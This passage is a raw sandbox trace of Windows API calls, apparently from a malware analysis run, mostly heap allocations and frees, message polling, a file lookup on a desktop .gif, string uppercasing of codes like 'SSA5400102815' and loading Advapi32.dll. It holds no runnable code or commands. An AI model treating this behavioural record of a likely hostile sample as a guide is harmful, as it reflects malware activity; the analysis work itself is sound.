lpMsg=0x8bf710) returned 0 [0164.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.435] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/eGIW Yzvh.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436f1980, ftCreationTime.dwHighDateTime=0x1d4c978, ftLastAccessTime.dwLowDateTime=0x2939a370, ftLastAccessTime.dwHighDateTime=0x1d4cf7a, ftLastWriteTime.dwLowDateTime=0x2939a370, ftLastWriteTime.dwHighDateTime=0x1d4cf7a, nFileSizeHigh=0x0, nFileSizeLow=0xe924, dwReserved0=0xf7d0006, dwReserved1=0xde38, cFileName="eGIW Yzvh.gif", cAlternateFileName="EGIWYZ~1.GIF")) returned 0xaa56a0 [0164.435] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.435] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0164.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.437] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.437] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0164.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0164.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.438] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.438] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.438] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.438] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.439] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0164.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.439] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.440] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.440] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0164.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.441] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0164.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.442] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.443] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.443] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.443] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.444] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0164.445] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0164.445] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0164.445] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.446] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0164.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.446] 